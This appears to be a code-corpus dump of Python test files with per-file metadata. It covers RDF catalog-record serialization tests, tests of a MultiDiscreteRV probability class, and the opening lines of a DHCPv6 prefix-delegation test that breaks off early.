    @prefix dct: <http://purl.org/dc/terms/> .
    @prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
    @prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
    @prefix dcat: <http://www.w3.org/ns/dcat#> .
    @prefix foaf: <http://xmlns.com/foaf/0.1/> .

    <http://wwww.digdir.no/.well-known/skolem/284db4d2-80c2-11eb-82c3-83e80baa2f94>
        a dcat:CatalogRecord .
    """
    # Pin the generated skolem IRI so serialization is deterministic.
    mocker.patch(
        "skolemizer.Skolemizer.add_skolemization",
        return_value=skolemization,
    )

    actual_graph = Graph().parse(data=record.to_rdf(), format="turtle")
    expected_graph = Graph().parse(data=expected, format="turtle")

    assert_isomorphic(actual_graph, expected_graph)
def test_to_graph_should_return_title() -> None:
    """It returns a title graph isomorphic to spec."""
    # (Removed a duplicated leftover docstring that talked about the
    # identifier test instead of the title test.)
    catalogrecord = CatalogRecord()
    catalogrecord.identifier = "http://example.com/catalogrecords/1"
    catalogrecord.title = {"nb": "Tittel 1", "en": "Title 1"}

    src = """
    @prefix dct: <http://purl.org/dc/terms/> .
    @prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
    @prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
    @prefix dcat: <http://www.w3.org/ns/dcat#> .

    <http://example.com/catalogrecords/1> a dcat:CatalogRecord ;
        dct:title "Title 1"@en, "Tittel 1"@nb ;
    .
    """
    g1 = Graph().parse(data=catalogrecord.to_rdf(), format="turtle")
    g2 = Graph().parse(data=src, format="turtle")

    _isomorphic = isomorphic(g1, g2)
    if not _isomorphic:
        # Dump the triple-level diff for debugging before failing.
        # (Removed a redundant trailing `pass` statement here.)
        _dump_diff(g1, g2)
    assert _isomorphic
def test_to_graph_should_return_description() -> None:
    """It returns a description graph isomorphic to spec."""
    catalogrecord = CatalogRecord()
    catalogrecord.identifier = "http://example.com/catalogrecords/1"
    catalogrecord.description = {"nb": "Beskrivelse", "en": "Description"}

    src = """
    @prefix dct: <http://purl.org/dc/terms/> .
    @prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
    @prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
    @prefix dcat: <http://www.w3.org/ns/dcat#> .

    <http://example.com/catalogrecords/1> a dcat:CatalogRecord ;
        dct:description "Description"@en, "Beskrivelse"@nb ;
    .
    """
    g1 = Graph().parse(data=catalogrecord.to_rdf(), format="turtle")
    g2 = Graph().parse(data=src, format="turtle")

    _isomorphic = isomorphic(g1, g2)
    if not _isomorphic:
        # Dump the triple-level diff for debugging before failing.
        # (Removed a redundant trailing `pass` statement here.)
        _dump_diff(g1, g2)
    assert _isomorphic
def test_to_graph_should_return_listing_date() -> None:
    """It returns a listing_date graph isomorphic to spec."""
    catalogrecord = CatalogRecord()
    catalogrecord.identifier = "http://example.com/catalogrecords/1"
    # listing_date maps to dct:issued in the serialization below.
    catalogrecord.listing_date = "2019-12-31"

    src = """
    @prefix dct: <http://purl.org/dc/terms/> .
    @prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
    @prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
    @prefix dcat: <http://www.w3.org/ns/dcat#> .
    @prefix xsd: <http://www.w3.org/2001/XMLSchema#> .

    <http://example.com/catalogrecords/1> a dcat:CatalogRecord ;
        dct:issued "2019-12-31"^^xsd:date ;
    .
    """
    g1 = Graph().parse(data=catalogrecord.to_rdf(), format="turtle")
    g2 = Graph().parse(data=src, format="turtle")

    _isomorphic = isomorphic(g1, g2)
    if not _isomorphic:
        # Dump the triple-level diff for debugging before failing.
        # (Removed a redundant trailing `pass` statement here.)
        _dump_diff(g1, g2)
    assert _isomorphic
def test_to_graph_should_return_modification_date() -> None:
    """It returns a modification_date graph isomorphic to spec."""
    catalogrecord = CatalogRecord()
    catalogrecord.identifier = "http://example.com/catalogrecords/1"
    # modification_date maps to dct:modified in the serialization below.
    catalogrecord.modification_date = "2019-12-31"

    src = """
    @prefix dct: <http://purl.org/dc/terms/> .
    @prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
    @prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
    @prefix dcat: <http://www.w3.org/ns/dcat#> .
    @prefix xsd: <http://www.w3.org/2001/XMLSchema#> .

    <http://example.com/catalogrecords/1> a dcat:CatalogRecord ;
        dct:modified "2019-12-31"^^xsd:date ;
    .
    """
    g1 = Graph().parse(data=catalogrecord.to_rdf(), format="turtle")
    g2 = Graph().parse(data=src, format="turtle")

    _isomorphic = isomorphic(g1, g2)
    if not _isomorphic:
        # Dump the triple-level diff for debugging before failing.
        # (Removed a redundant trailing `pass` statement here.)
        _dump_diff(g1, g2)
    assert _isomorphic
def test_to_graph_should_return_primary_topic() -> None:
    """It returns a primary_topic graph isomorphic to spec."""
    catalogrecord = CatalogRecord()
    catalogrecord.identifier = "http://example.com/catalogrecords/1"
    # The record's primary topic is a dataset with its own identifier.
    dataset = Dataset()
    dataset.identifier = "http://example.com/datasets/1"
    catalogrecord.primary_topic = dataset

    src = """
    @prefix dct: <http://purl.org/dc/terms/> .
    @prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
    @prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
    @prefix dcat: <http://www.w3.org/ns/dcat#> .
    @prefix foaf: <http://xmlns.com/foaf/0.1/> .

    <http://example.com/catalogrecords/1> a dcat:CatalogRecord ;
        foaf:primaryTopic <http://example.com/datasets/1>;
    .
    """
    g1 = Graph().parse(data=catalogrecord.to_rdf(), format="turtle")
    g2 = Graph().parse(data=src, format="turtle")

    _isomorphic = isomorphic(g1, g2)
    if not _isomorphic:
        # Dump the triple-level diff for debugging before failing.
        # (Removed a redundant trailing `pass` statement here.)
        _dump_diff(g1, g2)
    assert _isomorphic
def test_to_graph_should_return_primary_topic_skolemization(
    mocker: MockFixture,
) -> None:
    """It returns a primary_topic graph isomorphic to spec."""
    catalogrecord = CatalogRecord()
    catalogrecord.identifier = "http://example.com/catalogrecords/1"
    # The topic dataset has no identifier, so one is skolemized for it.
    dataset = Dataset()
    catalogrecord.primary_topic = dataset

    src = """
    @prefix dct: <http://purl.org/dc/terms/> .
    @prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
    @prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
    @prefix dcat: <http://www.w3.org/ns/dcat#> .
    @prefix foaf: <http://xmlns.com/foaf/0.1/> .

    <http://example.com/catalogrecords/1> a dcat:CatalogRecord ;
        foaf:primaryTopic
        <http://wwww.digdir.no/.well-known/skolem/284db4d2-80c2-11eb-82c3-83e80baa2f94>
    .
    """
    # Pin the generated skolem IRI so serialization is deterministic.
    mocker.patch(
        "skolemizer.Skolemizer.add_skolemization",
        return_value=skolemization,
    )

    g1 = Graph().parse(data=catalogrecord.to_rdf(), format="turtle")
    g2 = Graph().parse(data=src, format="turtle")

    _isomorphic = isomorphic(g1, g2)
    if not _isomorphic:
        # Dump the triple-level diff for debugging before failing.
        # (Removed a redundant trailing `pass` statement here.)
        _dump_diff(g1, g2)
    assert _isomorphic
def test_to_graph_should_return_conforms_to() -> None:
    """It returns a conforms_to graph isomorphic to spec."""
    catalogrecord = CatalogRecord()
    catalogrecord.identifier = "http://example.com/catalogrecords/1"
    # Multiple standards may be appended; both must appear in the graph.
    catalogrecord.conforms_to.append("http://example.com/standards/1")
    catalogrecord.conforms_to.append("http://example.com/standards/2")

    src = """
    @prefix dct: <http://purl.org/dc/terms/> .
    @prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
    @prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
    @prefix dcat: <http://www.w3.org/ns/dcat#> .

    <http://example.com/catalogrecords/1> a dcat:CatalogRecord ;
        dct:conformsTo <http://example.com/standards/1> ,
            <http://example.com/standards/2> ;
    .
    """
    g1 = Graph().parse(data=catalogrecord.to_rdf(), format="turtle")
    g2 = Graph().parse(data=src, format="turtle")

    _isomorphic = isomorphic(g1, g2)
    if not _isomorphic:
        # Dump the triple-level diff for debugging before failing.
        # (Removed a redundant trailing `pass` statement here.)
        _dump_diff(g1, g2)
    assert _isomorphic
# ---------------------------------------------------------------------- #
# Utils for displaying debug information
def _dump_diff(g1: Graph, g2: Graph) -> None:
    """Print the triples shared by, and unique to, each graph (debug aid)."""
    in_both, in_first, in_second = graph_diff(g1, g2)
    for label, graph in (
        ("both", in_both),
        ("first", in_first),
        ("second", in_second),
    ):
        print("\nin %s:" % label)
        _dump_turtle(graph)
def _dump_turtle(g: Graph) -> None:
    """Print the graph's Turtle serialization, skipping blank lines."""
    turtle = g.serialize(format="turtle")
    for line in turtle.splitlines():
        if line:
            print(line)
| 33.5
| 87
| 0.641303
| 1,310
| 10,251
| 4.901527
| 0.1
| 0.034886
| 0.044853
| 0.059804
| 0.860302
| 0.844105
| 0.834917
| 0.814515
| 0.814515
| 0.790531
| 0
| 0.041948
| 0.190713
| 10,251
| 305
| 88
| 33.609836
| 0.73204
| 0.065457
| 0
| 0.738938
| 0
| 0.097345
| 0.477287
| 0.012888
| 0
| 0
| 0
| 0
| 0.048673
| 1
| 0.053097
| false
| 0.039823
| 0.030973
| 0
| 0.084071
| 0.017699
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
330204a7f13757ec3958a3ca43b17ab6a3417823
| 16,551
|
py
|
Python
|
tests/probability2/multi_discrete_rv_test.py
|
rpazuki/algos
|
bca46326f58eb983db6efe55320bf95fcf2b895f
|
[
"MIT"
] | null | null | null |
tests/probability2/multi_discrete_rv_test.py
|
rpazuki/algos
|
bca46326f58eb983db6efe55320bf95fcf2b895f
|
[
"MIT"
] | 1
|
2020-08-12T06:56:59.000Z
|
2020-08-12T08:57:30.000Z
|
tests/probability2/multi_discrete_rv_test.py
|
chasing-entropy/algos
|
bca46326f58eb983db6efe55320bf95fcf2b895f
|
[
"MIT"
] | null | null | null |
import pytest
from probability2 import MultiDiscreteRV
def test_len_multidiscreterv():
    """len() and .size both report the number of component variables."""
    for ctor_args, expected in [
        (((1, 2), ["X1", "X2"]), 2),
        (((1, "aaa", "w1"),), 3),
        (((1, 2, 4, 2), ["X1", "X2", "X3", "X4"]), 4),
        (([1, 2, 3, 4], ["X1", "X2", "X3", "X4"]), 4),
    ]:
        rv = MultiDiscreteRV(*ctor_args)
        assert len(rv) == expected
        assert rv.size == expected
def test_index_of_multidiscreterv():
    """index_of returns the declared position of a name and -1 for unknowns."""
    specs = [
        ((1, ["X1"]), ["X1"]),
        (((1, 2), ["X1", "X2"]), ["X1", "X2"]),
        (((1, "aaa", "w1"), ["X1", "X2", "X3"]), ["X1", "X2", "X3"]),
        (((1, 2, 4, 2), ["X1", "X2", "X3", "X4"]), ["X1", "X2", "X3", "X4"]),
    ]
    for ctor_args, names in specs:
        rv = MultiDiscreteRV(*ctor_args)
        for position, name in enumerate(names):
            assert rv.index_of(name) == position
        # An undeclared name never resolves.
        assert rv.index_of("Y1") == -1
def test_indexer_multidiscreterv():
    """Components can be indexed both by position and by name."""
    rv = MultiDiscreteRV(1, ["X1"])
    assert rv[0].name == "X1"
    assert rv["X1"].name == "X1"
    # A tuple is not a valid index.
    with pytest.raises(ValueError):
        assert rv[(1,)] == "X1"
    for ctor_args in [
        ((1, 2), ["X1", "X2"]),
        ((1, "aaa", "w1"), ["X1", "X2", "X3"]),
        ((1, 2, 4, 2), ["X1", "X2", "X3", "X4"]),
    ]:
        rv = MultiDiscreteRV(*ctor_args)
        for position, name in enumerate(ctor_args[1]):
            assert rv[position].name == name
            assert rv[name].name == name
def test_contains_multidiscreterv():
    """`in` reports membership of component variable names."""
    specs = [
        ((1,), ["X1"]),
        (((1, 2), ["X1", "X2"]), ["X1", "X2"]),
        (((1, "aaa", "w1"), ["X1", "X2", "X3"]), ["X1", "X2", "X3"]),
        (((1, 2, 4, 2), ["X1", "X2", "X3", "X4"]), ["X1", "X2", "X3", "X4"]),
    ]
    for ctor_args, names in specs:
        rv = MultiDiscreteRV(*ctor_args)
        for name in names:
            assert name in rv
        assert "Y1" not in rv
def test_to_key_exceptions_multidiscreterv():
    """to_key raises ValueError for unknown names and wrong argument counts."""
    # wrong name: any keyword that is not a declared variable name must raise,
    # regardless of where it appears in the call.
    random_v = MultiDiscreteRV(1, ["X1"])
    with pytest.raises(ValueError):
        random_v.to_key(x2=2)
    random_v = MultiDiscreteRV((1, 2), ["X1", "X2"])
    with pytest.raises(ValueError):
        random_v.to_key(x1=1, x3=2)
    with pytest.raises(ValueError):
        random_v.to_key(x3=1, x1=2)
    random_v = MultiDiscreteRV(
        ("a", 1, "w1"),
        ["X1", "X2", "X3"],
    )
    with pytest.raises(ValueError):
        random_v.to_key(x1=1, x2=3, x4=2)
    with pytest.raises(ValueError):
        random_v.to_key(x1=1, x4=2, x2=3)
    with pytest.raises(ValueError):
        random_v.to_key(x4=2, x1=1, x2=3)
    random_v = MultiDiscreteRV(
        (1, 2, 4, 2),
        ["X1", "X2", "X3", "X4"],
    )
    with pytest.raises(ValueError):
        random_v.to_key(x1=1, x2=3, x3=2, x5=1)
    with pytest.raises(ValueError):
        random_v.to_key(x1=1, x2=2, x5=1, x3=3)
    with pytest.raises(ValueError):
        random_v.to_key(x1=2, x5=1, x2=1, x3=3)
    with pytest.raises(ValueError):
        random_v.to_key(x5=1, x1=2, x2=1, x3=3)
    # wrong length: too few or too many values, whether supplied positionally,
    # by keyword, or as a mix of both.
    random_v = MultiDiscreteRV(1, ["X1"])
    with pytest.raises(ValueError):
        random_v.to_key()
    with pytest.raises(ValueError):
        random_v.to_key(1, 2)
    with pytest.raises(ValueError):
        random_v.to_key(1, x1=1)
    with pytest.raises(ValueError):
        random_v.to_key(x1=1, x2=1)
    random_v = MultiDiscreteRV((1, 2), ["X1", "X2"])
    with pytest.raises(ValueError):
        random_v.to_key()
    with pytest.raises(ValueError):
        random_v.to_key(1)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, 3)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, 3, 4)
    with pytest.raises(ValueError):
        random_v.to_key(x1=1)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, x1=1)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, 3, x1=1)
    with pytest.raises(ValueError):
        random_v.to_key(1, x1=1, x2=1)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, x1=1, x2=1)
    with pytest.raises(ValueError):
        random_v.to_key(x1=1, x2=1, x3=3)
    with pytest.raises(ValueError):
        random_v.to_key(1, x1=1, x2=1, x3=3)
    random_v = MultiDiscreteRV(
        ("a", 1, "w1"),
        ["X1", "X2", "X3"],
    )
    with pytest.raises(ValueError):
        random_v.to_key()
    with pytest.raises(ValueError):
        random_v.to_key(1)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, 3, 4)
    with pytest.raises(ValueError):
        random_v.to_key(x1=1)
    with pytest.raises(ValueError):
        random_v.to_key(1, x1=1)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, 4, x1=1)
    with pytest.raises(ValueError):
        random_v.to_key(x1=1, x2=1)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, x1=1, x2=1)
    with pytest.raises(ValueError):
        random_v.to_key(x1=1, x2=1, x3=1, x4=2)
    with pytest.raises(ValueError):
        random_v.to_key(1, x1=1, x2=1, x3=1, x4=2)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, x1=1, x2=1, x3=1, x4=2)
    random_v = MultiDiscreteRV(
        (1, 2, 4, 2),
        ["X1", "X2", "X3", "X4"],
    )
    with pytest.raises(ValueError):
        random_v.to_key()
    with pytest.raises(ValueError):
        random_v.to_key(1)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, 3)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, 3, 4, 5)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, 3, 4, 5, 6)
    with pytest.raises(ValueError):
        random_v.to_key(x1=1)
    with pytest.raises(ValueError):
        random_v.to_key(1, x1=1)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, x1=1)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, 3, 4, x1=1)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, 3, 4, 5, x1=1)
    with pytest.raises(ValueError):
        random_v.to_key(x1=1, x2=1)
    with pytest.raises(ValueError):
        random_v.to_key(1, x1=1, x2=1)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, 3, x1=1, x2=1)
    with pytest.raises(ValueError):
        random_v.to_key(x1=1, x2=1, x3=1)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, x1=1, x2=1, x3=1)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, 3, x1=1, x2=1, x3=1)
    with pytest.raises(ValueError):
        random_v.to_key(1, x1=1, x2=1, x3=1, x4=2)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, x1=1, x2=1, x3=1, x4=2)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, 3, x1=1, x2=1, x3=1, x4=2)
    with pytest.raises(ValueError):
        random_v.to_key(x1=1, x2=1, x3=1, x4=2, x5=5)
    with pytest.raises(ValueError):
        random_v.to_key(1, x1=1, x2=1, x3=1, x4=2, x5=5)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, x1=1, x2=1, x3=1, x4=2, x5=5)
    with pytest.raises(ValueError):
        random_v.to_key(1, 2, 3, x1=1, x2=1, x3=1, x4=2, x5=5)
def test_to_key_multidiscreterv():
    """to_key builds the key from any mix of positional and keyword values.

    Positional values fill the variables not given by keyword, in
    declaration order; keyword order must not affect the result.
    """
    # Single variable: the key is the bare value, not a 1-tuple.
    random_v = MultiDiscreteRV(1, ["X1"])
    assert random_v.to_key(2) == 2
    assert random_v.to_key(X1=2) == 2
    # Two variables: every positional/keyword split and keyword ordering.
    random_v = MultiDiscreteRV((1, 2), ["X1", "X2"])
    assert random_v.to_key(1, 2) == (1, 2)
    assert random_v.to_key(1, X2=2) == (1, 2)
    assert random_v.to_key(2, X1=1) == (1, 2)
    assert random_v.to_key(X1=1, X2=2) == (1, 2)
    assert random_v.to_key(X2=2, X1=1) == (1, 2)
    # Three variables.
    random_v = MultiDiscreteRV(
        ("a", 1, "w1"),
        ["X1", "X2", "X3"],
    )
    assert random_v.to_key("a", 1, "w1") == ("a", 1, "w1")
    assert random_v.to_key("a", 1, X3="w1") == ("a", 1, "w1")
    assert random_v.to_key("a", "w1", X2=1) == ("a", 1, "w1")
    assert random_v.to_key(1, "w1", X1="a") == ("a", 1, "w1")
    assert random_v.to_key("a", X2=1, X3="w1") == ("a", 1, "w1")
    assert random_v.to_key(1, X1="a", X3="w1") == ("a", 1, "w1")
    assert random_v.to_key("w1", X1="a", X2=1) == ("a", 1, "w1")
    assert random_v.to_key("a", X3="w1", X2=1) == ("a", 1, "w1")
    assert random_v.to_key(1, X3="w1", X1="a") == ("a", 1, "w1")
    assert random_v.to_key("w1", X2=1, X1="a") == ("a", 1, "w1")
    assert random_v.to_key(X1="a", X2=1, X3="w1") == ("a", 1, "w1")
    assert random_v.to_key(X1="a", X3="w1", X2=1) == ("a", 1, "w1")
    assert random_v.to_key(X2=1, X1="a", X3="w1") == ("a", 1, "w1")
    assert random_v.to_key(X2=1, X3="w1", X1="a") == ("a", 1, "w1")
    assert random_v.to_key(X3="w1", X1="a", X2=1) == ("a", 1, "w1")
    assert random_v.to_key(X3="w1", X2=1, X1="a") == ("a", 1, "w1")
    # Four variables.
    random_v = MultiDiscreteRV(
        ("a", 1, "w1", 4),
        ["X1", "X2", "X3", "X4"],
    )
    assert random_v.to_key("a", 1, "w1", 4) == ("a", 1, "w1", 4)
    assert random_v.to_key("a", 1, "w1", X4=4) == ("a", 1, "w1", 4)
    assert random_v.to_key("a", 1, 4, X3="w1") == ("a", 1, "w1", 4)
    assert random_v.to_key("a", "w1", 4, X2=1) == ("a", 1, "w1", 4)
    assert random_v.to_key(1, "w1", 4, X1="a") == ("a", 1, "w1", 4)
    assert random_v.to_key("a", 1, X3="w1", X4=4) == ("a", 1, "w1", 4)
    assert random_v.to_key("a", 1, X4=4, X3="w1") == ("a", 1, "w1", 4)
    assert random_v.to_key("a", "w1", X2=1, X4=4) == ("a", 1, "w1", 4)
    assert random_v.to_key("a", "w1", X4=4, X2=1) == ("a", 1, "w1", 4)
    assert random_v.to_key(1, "w1", X1="a", X4=4) == ("a", 1, "w1", 4)
    assert random_v.to_key(1, "w1", X4=4, X1="a") == ("a", 1, "w1", 4)
    assert random_v.to_key("a", 4, X2=1, X3="w1") == ("a", 1, "w1", 4)
    assert random_v.to_key("a", 4, X3="w1", X2=1) == ("a", 1, "w1", 4)
    assert random_v.to_key(1, 4, X1="a", X3="w1") == ("a", 1, "w1", 4)
    assert random_v.to_key(1, 4, X3="w1", X1="a") == ("a", 1, "w1", 4)
    assert random_v.to_key("w1", 4, X1="a", X2=1) == ("a", 1, "w1", 4)
    assert random_v.to_key("w1", 4, X2=1, X1="a") == ("a", 1, "w1", 4)
    assert random_v.to_key("a", X2=1, X3="w1", X4=4) == ("a", 1, "w1", 4)
    assert random_v.to_key("a", X3="w1", X2=1, X4=4) == ("a", 1, "w1", 4)
    assert random_v.to_key("a", X3="w1", X4=4, X2=1) == ("a", 1, "w1", 4)
    assert random_v.to_key("a", X2=1, X4=4, X3="w1") == ("a", 1, "w1", 4)
    assert random_v.to_key(1, X1="a", X3="w1", X4=4) == ("a", 1, "w1", 4)
    assert random_v.to_key(1, X3="w1", X1="a", X4=4) == ("a", 1, "w1", 4)
    assert random_v.to_key(1, X3="w1", X4=4, X1="a") == ("a", 1, "w1", 4)
    assert random_v.to_key(1, X1="a", X4=4, X3="w1") == ("a", 1, "w1", 4)
    assert random_v.to_key("w1", X1="a", X2=1, X4=4) == ("a", 1, "w1", 4)
    assert random_v.to_key("w1", X2=1, X1="a", X4=4) == ("a", 1, "w1", 4)
    assert random_v.to_key("w1", X2=1, X4=4, X1="a") == ("a", 1, "w1", 4)
    assert random_v.to_key("w1", X1="a", X4=4, X2=1) == ("a", 1, "w1", 4)
    assert random_v.to_key(4, X1="a", X2=1, X3="w1") == ("a", 1, "w1", 4)
    assert random_v.to_key(4, X2=1, X1="a", X3="w1") == ("a", 1, "w1", 4)
    assert random_v.to_key(4, X2=1, X3="w1", X1="a") == ("a", 1, "w1", 4)
    assert random_v.to_key(4, X1="a", X3="w1", X2=1) == ("a", 1, "w1", 4)
    # All-keyword calls in every ordering.
    assert random_v.to_key(X1="a", X2=1, X3="w1", X4=4) == ("a", 1, "w1", 4)
    assert random_v.to_key(X1="a", X2=1, X4=4, X3="w1") == ("a", 1, "w1", 4)
    assert random_v.to_key(X1="a", X3="w1", X2=1, X4=4) == ("a", 1, "w1", 4)
    assert random_v.to_key(X1="a", X3="w1", X4=4, X2=1) == ("a", 1, "w1", 4)
    assert random_v.to_key(X2=1, X1="a", X3="w1", X4=4) == ("a", 1, "w1", 4)
    assert random_v.to_key(X2=1, X1="a", X4=4, X3="w1") == ("a", 1, "w1", 4)
    assert random_v.to_key(X2=1, X3="w1", X1="a", X4=4) == ("a", 1, "w1", 4)
    assert random_v.to_key(X2=1, X3="w1", X4=4, X1="a") == ("a", 1, "w1", 4)
    assert random_v.to_key(X2=1, X4=4, X3="w1", X1="a") == ("a", 1, "w1", 4)
    assert random_v.to_key(X2=1, X4=4, X1="a", X3="w1") == ("a", 1, "w1", 4)
    assert random_v.to_key(X3="w1", X1="a", X2=1, X4=4) == ("a", 1, "w1", 4)
    assert random_v.to_key(X3="w1", X1="a", X4=4, X2=1) == ("a", 1, "w1", 4)
    assert random_v.to_key(X3="w1", X2=1, X1="a", X4=4) == ("a", 1, "w1", 4)
    assert random_v.to_key(X3="w1", X2=1, X4=4, X1="a") == ("a", 1, "w1", 4)
    assert random_v.to_key(X3="w1", X4=4, X1="a", X2=1) == ("a", 1, "w1", 4)
    assert random_v.to_key(X3="w1", X4=4, X2=1, X1="a") == ("a", 1, "w1", 4)
    assert random_v.to_key(X4=4, X1="a", X2=1, X3="w1") == ("a", 1, "w1", 4)
    assert random_v.to_key(X4=4, X1="a", X3="w1", X2=1) == ("a", 1, "w1", 4)
    assert random_v.to_key(X4=4, X2=1, X1="a", X3="w1") == ("a", 1, "w1", 4)
    assert random_v.to_key(X4=4, X2=1, X3="w1", X1="a") == ("a", 1, "w1", 4)
    assert random_v.to_key(X4=4, X3="w1", X1="a", X2=1) == ("a", 1, "w1", 4)
    assert random_v.to_key(X4=4, X3="w1", X2=1, X1="a") == ("a", 1, "w1", 4)
def test_to_dict_key_multidiscreterv():
    """to_dict_key maps each variable name to its supplied value."""
    random_v = MultiDiscreteRV(1, ["X1"])
    # NOTE(review): the single-variable cases are commented out in the
    # original — presumably to_dict_key's single-variable behavior is
    # unsettled; confirm before re-enabling.
    # assert random_v.to_dict_key(2) == {"X1": 2}
    # assert random_v.to_dict_key(X1=2) == {"X1": 2}
    # Two variables: positional, mixed, and keyword-only calls.
    random_v = MultiDiscreteRV((1, 2), ["X1", "X2"])
    assert random_v.to_dict_key(1, 2) == {"X1": 1, "X2": 2}
    assert random_v.to_dict_key(1, X2=2) == {"X1": 1, "X2": 2}
    assert random_v.to_dict_key(X1=1, X2=2) == {"X1": 1, "X2": 2}
    # Three variables.
    random_v = MultiDiscreteRV(
        ("a", 1, "w1"),
        ["X1", "X2", "X3"],
    )
    assert random_v.to_dict_key("a", 1, "w1") == {"X1": "a", "X2": 1, "X3": "w1"}
    assert random_v.to_dict_key("a", 1, X3="w1") == {"X1": "a", "X2": 1, "X3": "w1"}
    assert random_v.to_dict_key("a", X2=1, X3="w1") == {"X1": "a", "X2": 1, "X3": "w1"}
    assert random_v.to_dict_key(1, X1="a", X3="w1") == {"X1": "a", "X2": 1, "X3": "w1"}
    assert random_v.to_dict_key(1, X3="w1", X1="a") == {"X1": "a", "X2": 1, "X3": "w1"}
    assert random_v.to_dict_key("w1", X2=1, X1="a") == {"X1": "a", "X2": 1, "X3": "w1"}
    assert random_v.to_dict_key(X1="a", X2=1, X3="w1") == {
        "X1": "a",
        "X2": 1,
        "X3": "w1",
    }
    assert random_v.to_dict_key(X3="w1", X1="a", X2=1) == {
        "X1": "a",
        "X2": 1,
        "X3": "w1",
    }
    # Four variables.
    random_v = MultiDiscreteRV(
        ("a", 1, "w1", 4),
        ["X1", "X2", "X3", "X4"],
    )
    assert random_v.to_dict_key("a", 1, "w1", 4) == {
        "X1": "a",
        "X2": 1,
        "X3": "w1",
        "X4": 4,
    }
    assert random_v.to_dict_key("a", 1, "w1", X4=4) == {
        "X1": "a",
        "X2": 1,
        "X3": "w1",
        "X4": 4,
    }
    assert random_v.to_dict_key("a", 1, X3="w1", X4=4) == {
        "X1": "a",
        "X2": 1,
        "X3": "w1",
        "X4": 4,
    }
    assert random_v.to_dict_key("a", X2=1, X3="w1", X4=4) == {
        "X1": "a",
        "X2": 1,
        "X3": "w1",
        "X4": 4,
    }
    assert random_v.to_dict_key(X1="a", X2=1, X3="w1", X4=4) == {
        "X1": "a",
        "X2": 1,
        "X3": "w1",
        "X4": 4,
    }
    assert random_v.to_dict_key(X2=1, X1="a", X4=4, X3="w1") == {
        "X1": "a",
        "X2": 1,
        "X3": "w1",
        "X4": 4,
    }
| 37.787671
| 87
| 0.535738
| 2,920
| 16,551
| 2.879795
| 0.015068
| 0.205613
| 0.169105
| 0.198359
| 0.960518
| 0.944702
| 0.93507
| 0.925318
| 0.910096
| 0.882269
| 0
| 0.107036
| 0.232312
| 16,551
| 437
| 88
| 37.874142
| 0.554777
| 0.006888
| 0
| 0.575064
| 0
| 0
| 0.056719
| 0
| 0
| 0
| 0
| 0
| 0.386768
| 1
| 0.017812
| false
| 0
| 0.005089
| 0
| 0.022901
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
330aecd80cfef8d583643e23557497bc06e813d2
| 8,486
|
py
|
Python
|
tests/dhcpv6/prefix_delegation/test_v6_prefix_delegation_renew.py
|
shawnmullaney/forge
|
aaaef0a0645f73d24666aab6a400f3604e753aac
|
[
"0BSD"
] | null | null | null |
tests/dhcpv6/prefix_delegation/test_v6_prefix_delegation_renew.py
|
shawnmullaney/forge
|
aaaef0a0645f73d24666aab6a400f3604e753aac
|
[
"0BSD"
] | null | null | null |
tests/dhcpv6/prefix_delegation/test_v6_prefix_delegation_renew.py
|
shawnmullaney/forge
|
aaaef0a0645f73d24666aab6a400f3604e753aac
|
[
"0BSD"
] | null | null | null |
"""DHCPv6 Prefix Delegation"""
# pylint: disable=invalid-name,line-too-long
import pytest
import misc
import srv_msg
import references
import srv_control
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.PD
@pytest.mark.rfc3633
def test_prefix_delegation_onlyPD_renew():
    """SOLICIT/REQUEST/RENEW with only IA_PD; every reply must carry a prefix.

    Option 25 is IA_PD and sub-option 26 is IAPREFIX (RFC 3633).
    """
    misc.test_setup()
